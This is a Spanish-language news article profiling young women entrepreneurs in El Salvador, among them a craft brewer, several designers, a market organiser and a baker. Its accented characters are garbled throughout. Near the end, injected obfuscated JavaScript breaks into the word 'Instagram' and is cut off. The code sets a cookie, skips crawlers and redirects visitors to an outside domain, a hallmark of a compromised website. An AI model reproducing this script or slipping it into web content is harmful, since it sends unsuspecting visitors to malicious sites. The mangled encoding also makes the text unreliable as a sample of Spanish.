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4 Jul 2016
Noticias | Por: Redacción

Mujeres jA?venes emprendedoras exitosas de El Salvador

Llenas de optimismo, solidarias con el medio ambiente y todo lo que les rodea, asAi?? como con una actitud de lucha ante los obstA?culos que les presenta la vida son algunas de las caracterAi??sticas de las jA?venes mujeres que forman parte de las mA?s exitosas en El Salvador.

AcA? te presentamos algunas de esas mujeres jA?venes que ademA?s de ser excelentes estrategas en sus negocios e innovar con sus diseAi??os, consideran a la empresa como una oportunidad de trabajo e innovaciA?n en las ventajas competitivas que ofrece el paAi??s.

Cecilia Cruz de Palma

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Como una joven experta en crear sabores de cerveza, ha sabido vencer los retos de pertenecer a una carrera dominada, en su mayorAi??a, por hombres. Su reto inicial era crear una cultura cervecera en la poblaciA?n salvadoreAi??a, que fuese mA?s allA? de solamente consumirla, mediante su negocio Santo Coraje.EstudiA? BiotecnologAi??a en Alemania y a pesar de tener la oportunidad de quedarse ahAi??, optA? por volver a El Salvador para realizar algo que cambiase la historia de la cerveza en el paAi??s.

ai???Y lo hice porque amo a mi paAi??s, creo en Ai??l y sAi?? que con esfuerzo puedo lograr todo lo que me propongaai???, comentA? Cruz de Palma.Entre sus creaciones destacan tres cervezas distintas: la Radler, una opciA?n light, natural mA?s refrescante con un sabor ligero a limA?n; la Weizen, con alta cantidad de proteAi??na, pero con sabores suaves y sabor leve a banano; la Dunkel, cerveza oscura para los amantes del cafAi?? y caramelo con sabor amargo; Premium Lager, con mA?s amargor y mA?s malta en color anaranjado oscuro; y la Classic Pils, proviene de la ciudad checa Pilsen, con un tipo de malta y uno de lA?pulo para una combinaciA?n de amargura y dulzura.

ai???Santo Coraje nace de la idea de que una cosa no se hace sin coraje, esta es nuestra filosofAi??a y esta cerveza es hecha en El Salvador pero con la buena calidad de una cerveza alemanaai???, afirmA? Cecilia. Su establecimiento da trabajo a mano de obra salvadoreAi??a y la combina con instrumentos de elaboraciA?n procedentes de Alemania.

Si deseas conocer mA?s sobre sus productos y servicios, puedes acceder a su sitio web oficial aquAi?? o acceder a su Facebook, Twitter e Instagram.

Violeta Sandoval

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Foto tomada de: www.elsalvador.com

Cuando participA? en la competencia de Contempo, del Museo MARTE, aprendiA? las tAi??cnicas necesarias para estampar diseAi??os en carteras, paAi??uelos, billeteras y zapatos. La idea era fabricar textiles con ideas salvadoreAi??as, pero que tuviesen potencial de venta en el extranjero.

En 2013, logrA? ganar la competencia nacional, la centroamericana y con su marca Vaiza fue acreedora del Premio Mundial como Estudiante Emperador (GSEA) realizado en Tailandia. Sus ventas se realizan por medio de las reded sociales y exporta sus productos a las Islas VAi??rgenes BritA?nicas y PanamA?.

Todos sus diseAi??os son 100% salvadoreAi??os y ella elabora sus propios diseAi??os. Si deseas mA?s informaciA?n sobre sus productos, puede ingresar a su Facebook o Twitter.

Lula Mena

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Es una diseAi??adora artesanal salvadoreAi??a que elabora a mano sus productos ecoamigables. A finales del 2014, abriA? su propia tienda y su labor ha servido para empoderar a las mujeres artesanas de diversas partes del territorio nacional, ademA?s de dedicarse a preservar la identidad cultural del paAi??s.

Sus diseAi??os se caracterizan por ser amigables con el ambiente, hechos a mano y regidos bajo las normas justas de comercio. ai???Trabajo con comunidades de mujeres en el A?rea rural de bajos recursos y muchas de ellas en riesgo social. Por ello, mi enfoque es el empoderamiento de la mujer salvadoreAi??aai???, afirmA? Lula.

Dentro de sus mayores logros estA?n: representar al diseAi??o de El Salvador en ai???Emmy GIfting Suitesai???, donde obsequiA? su bisuterAi??a a los invitados del premio Emmy; su trabajo ha sido publicado como innovador en Dwell Design, Metropolitan Home, Home y Garden e Wisteria Magazine; ha participado en ferias de diseAi??o en Europa, USA, JapA?n y CentroamAi??rica; ademA?s obtuvo el primer lugar en el concurso Nacional de NeoartesanAi??as de El Salvador.

Entre la variedad de sus productos se encuentran bisuterAi??a, productos para el hogar y uso personal, garantizado en calidad y por ser 100% salvadoreAi??os con innovadores diseAi??os. Anteriormente, tenAi??a la tienda Qumbo-DiseAi??o a Guacaladas, donde exhibAi??a su marca, Lula Mena, y los productos de diversos diseAi??adores o artistas salvadoreAi??os.

Si deseas conocer mA?s sobre sus productos y servicios, puedes acceder a su sitio web oficial aquAi?? o ingresar a su Facebook, Twitter e Instagram.

Jacqueline Suriano

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Foto tomada por: www.trendsandstylesv.com

Ya concluyA? sus estudios en una de las mejores universidades del mundo del diseAi??o, Parsons The New School for Design en Nueva York, Estados Unidos. Su talento en el mundo de la moda la llevA? a trabajar para Tommy Hilfiger, sin embargo decidiA? regresar a El Salvador y emprender su propio negocio.

Ha creado una marca de carteras elaboradas, que se caracterizan por sus diseAi??os A?nicos e innovadores para la mujer actual del mundo entero. Jacqueline considera que sus diseAi??os son fruto de la mezcla cultural que ella posee, ya que es de ascendencia china, salvadoreAi??a y estadounidense.

Sus bolsos tienen formas geomAi??tricas, por lo que han llamado la atenciA?n de sus clientes en PerA? y la llevaron a colaborar con el pintor NicolA?s Shi. La joven emprendedora planea que sus productos se conviertan en exportaciA?n.

Su principal objetivo es demostrar que los artesanos locales tienen talento y habilidad de crear productos de calidad, ya que en todos sus diseAi??os utiliza cuero y una colecciA?n especial de artes en cuerina. De la misma manera, forma parte de Voces Vitales, donde se especializan en empoderar a la mujer para convertirla en una empresaria de Ai??xito.

Si deseas conocer mA?s sobre sus productos, puedes buscarlos en su sitio web oficial aquAi?? o en Facebook, Twitter e Instagram.

Cinthya Alejandra Puhach

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Foto tomada de: www.joven360.com.ni

Su idea de ai???El Mercaditoai??? naciA? para dar la oportunidad de comercializar sus productos a los emprendedores y se realiza cada uno o dos meses desde el pasado mes de julio de 2015. El A?nico filtro para participar es que sean productos 100% salvadoreAi??os, debido que su eslogan es ai???compra, come y bebe localai???.

La razA?n del Ai??xito de la idea de Cynthia radica en que logrA? identificar las necesidades actuales de los emprendedores locales e implementarlas en ai???El Mercaditoai???. Por medio del proyecto, se logrA? cambiar la mentalidad de los productos producidos en el paAi??s.

Cynthia se caracteriza por tenerle amor a los sueAi??os de otras personas y esto se ve reflejado en el Ai??xito de su idea, en cA?mo le facilitA? el comercio de sus productos y servicios a varios emprendedores salvadoreAi??os. Es actualmente, la directora del emprendimiento de ai???El Mercaditoai???, ya que impactA? de manera positiva el paAi??s y su perspectiva para con los productores nacionales.

Si deseas conocer mA?s sobre los productos y servicios de ai???El Mercaditoai???, puedes ingresar a su Facebook aquAi??.

Renata Moreno

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Su visiA?n es ayudar al paAi??s mediante la generaciA?n de empleos, ya que posee su propia empresa. IniciA? a los 11 aAi??os vendiendo Ai??oquis por encargo a algunos restaurantes, mA?s adelante montA? una cocina industrial en el comedor de la casa de sus padres y luego, sacA? dos cursos en Roma y en EspaAi??a su maestrAi??a.

“Introducimos las tortas, los pasteles. Poco a poco fuimos aAi??adiendo lo salado: las tajaditas, los sA?ndwiches. CubrAi??amos ‘coffee breaks’ en eventos pequeAi??os. La gente me encargaba los sA?ndwiches para las piAi??atas de sus hijos”, rememorA? Renata

“Creo que esa es una buena forma de ayudar al paAi??s. Vemos que hay oportunidades, que hay que luchar para salir adelante. Ese es el tipo de gente que yo tengo en mi equipo. Vemos para adelante. Hay familias detrA?s de todos nosotros”, afirmA? Moreno.

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Eugenia Folgar

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Foto tomada de: www.elsalvador.com

Con solamente 29 aAi??os de edad, es una diseAi??adora grA?fica especialista en superficies textiles. Durante su tiempo libre ha creado la marca ai???Weirdoai???, que es una lAi??nea de accesorios e indumentaria deportiva a la moda.

Dentro de la colecciA?n, uno de sus principales productos es una prenda que se puede utilizar en la cabeza y el cuello, la Weirdo urban tube. Este producto es una bandana tubular deportiva, por lo que ofrece la facilidad de usarse para sostener el cabello, cubrir la nariz durante la Ai??poca de frAi??o o de diferentes maneras.

Esta joven mujer dedica su tiempo a la fabricaciA?n de los diseAi??os en digital y posteriormente, los sublima para pasarlos a las telas elA?sticas. Sus prendas son comercializadas a travAi??s de las redes sociales, asAi?? como en El Mercadito.

Si deseas conocer mA?s sobre sus productos y servicios, puedes ingresar a su Facebook, Twitter o Instagyvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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